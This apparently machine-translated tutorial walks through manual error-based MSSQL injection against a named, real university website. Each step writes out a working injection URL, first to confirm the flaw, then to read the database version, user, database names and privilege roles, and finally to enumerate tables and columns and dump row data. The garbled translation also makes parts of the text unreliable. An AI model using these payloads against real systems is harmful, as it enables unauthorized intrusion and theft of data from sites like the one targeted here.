Detailed manual database Explosion Process and statement Parsing

Mssql injection in error mode 2.1 Basic Information 2.1.1 determine whether injection exists http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103 'According to the error echo with single quotation marks, it is found that it is a forward type, and further judgment is made through' and '1' = '1' and '2' = '2. It is conceivable that the SQL statement may be: select * from table where string = '000000', which is a complete SQL statement and can be constructed: select * from table where string = '000000' and '1' = '1' and '2' = '2'. The statement we added is: and '1' = '1' and '2' = '2, which can close the single quotation marks on both sides of the original '123. Where '1' = '1', we can use 1 = 1 instead. The results returned by the SQL query are normal, but an error is returned using a =, use 'A' = 'A' to return a correct result. Here, numbers on both sides of the equal sign should be a special case. You can construct the required SQL Injection statement in and '1' = '1. 2.1.2 determine whether it is mssqlyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and (select count (*) from sysobjects)> 1 and '1'!> '3 Mssql each database has a table sysobject. Therefore, if it is an mssql database, the results returned by the query statement must be greater than 1, that is, select count (*) from sysobjects)> 1. The logic is correct and the page returns normally. 2.1.3 mssql version yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select @ version) and '1'!> '3, and '1'!> '3 is a permanent condition, and the semantics is that the string '1' is not equal to the string '3'. Here we can construct other arbitrary conditions, for example, '1' = '1, '2' = '2, and 'A' = 'a. 2.1.4 current user yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select user) and '1'!> '3 2.1.5 current database yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select db_name () and '1'!> '3 when the current database is Gwork_ahnd 2.1.6, all the databases are yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select name from master. dbo. sysdatabases where dbid = 1) and '1'!> '3 by changing the value of dbid, such as 1, 2, and 3, all databases can pop up. 2.1.7 determine the user permission judgment server role: yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select IS_SRVROLEMEMBER ('sysadmin') and '1'!> '3 server role permissions include sysadmin, serveradmin, setupadmin, securityadmin, diskadmin, and bulkadmin to determine database roles: yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and 1 = (select is_member ('db _ owner') and '1'!> '3 database role permissions: public, db_owner, and so on. Determine whether the server role is sa. select IS_SRVROLEMEMBER ('sysadmin'). 1 is returned, the sa permission user has the public and db_owner permissions, but the user with the public and db_owner permissions is not necessarily the highest sa permission. The user permission here is db_owner: 2.2 pop-up table name information 2.2.1 determine the number of tables http://yjsc.ahau.edu.cn/web/InfoKindList.aspx?kind=0103 'And (select cast (count (*) as varchar (100) % 2 bchar (94) from sysobjects where xtype = 'U') = 1 and '1'!> '3. Pay attention to several aspects. One is the use of the cast function. After the user table data is taken out, it is converted to the varchar type and connected to the "^" character, "% 2b" is the url encoding format of the character "+", and "+" is the connection string in mssql. Here, % 2b must be used to replace "+". Otherwise, an error is returned. Char (94) = ^ 2.2.2 blow the first table name yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and (select top 1 name from sysobjects where xtype = 'U')> 1 and '1'!> '3 2.2.3. Method 1: Use not inyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and convert (int, (select top 1 name from sysobjects where xtype = 'U' and name not in ('py _ WKJSJDJKS')> 1 and '1'!> '3 Method 2: Use select topyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and convert (int, (select top 1 name from sysobjects where xtype = 'U' and name not in (select top 1 name from sysobjects where xtype = 'U')> 1 and '1'!> '3 2.3 Explosion column Name Information 2.3.1 explosion first column name, with having 1 = 1yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and (select * from PY_WKJSJDJKS having 1 = 1)> 1 and '1'!> '3 2.3.2 use group byyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and (select * from PY_WKJSJDJKS group by xh)> 1 and '1'!> '3 2.4 data explosion information 2.4.1 read the first data (read the data in the name column of the Web_InfoKinds table) yjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and (select top 1 name from Web_InfoKinds)> 1 and '1'!> '3 2.4.2 method 1 for reading the second data entry: not inyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and convert (int, (select top 1 name from Web_InfoKinds where name not in ('department introduction')> 1 and '1'!> '3 this method is correct in syntax, but the error cannot be run. Method 2: select topyjsc.ahau.edu.cn/web/InfoKindList.aspx? Kind = 0103 'and convert (int, (select top 1 name from Web_InfoKinds where name not in (select top 1 name from Web_InfoKinds)> 1 and '1'!> '3 and above method 2 are more efficient than method 1.